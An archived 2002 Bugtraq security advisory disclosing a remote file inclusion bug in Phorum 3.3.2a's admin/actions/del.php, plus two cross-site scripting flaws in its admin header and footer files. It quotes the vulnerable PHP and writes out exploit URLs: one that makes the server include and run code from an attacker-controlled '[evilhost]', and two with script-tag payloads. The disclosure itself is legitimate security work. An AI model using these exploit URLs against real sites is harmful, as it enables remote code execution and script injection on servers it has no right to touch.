[25496] in bugtraq
Phorum 3.3.2a has another bug for remote command execution
daemon@ATHENA.MIT.EDU (Markus Arndt)
Sat May 18 13:30:04 2002
Date: Sat, 18 May 2002 12:32:56 +0200
Message-Id: <200205181032.g4IAWuX04533@mailgate5.cinetic.de>
MIME-Version: 1.0
From: "Markus Arndt" <markus-arndt@web.de>
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Target:
Phorum 3.3.2a (maybee older)
Description:
Phorum 3.3.2a let's remote users execute arbitary code
Found by:
Markus Arndt<markus-arndt@web.de>
Vendor:
http://www.phorum.org
Notified Vendor:
Yes, already fixed in 3.3.2b
Details:
Another bug for remote command execution.
This time it's admin/actions/del.php
:)
Some code:
<?php
require "$include_path/delete_message.php";
delete_messages($id);
QueMessage("Message(s) $id and all children were deleted!<br>");
?>
The url to exploit the script would be:
http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls
That url will make the script include http://[evilhost]/delete_message.php
GoGoGo and secure your boxes. :)
One other thing before i forget:
CSS-Attacks are possible on 2 files..
http://[host]/phorum/admin/footer.php?GLOBALS[message]=<script>alert("css strikes!");</script>
http://[host]/phorum/admin/header.php?GLOBALS[message]=<script>alert("css strikes!");</script>
Markus Arndt<markus-arndt@web.de>
http://skka.de
________________________________________________________________
Keine verlorenen Lotto-Quittungen, keine vergessenen Gewinne mehr!
Beim WEB.DE Lottoservice: http://tippen2.web.de/?x=13
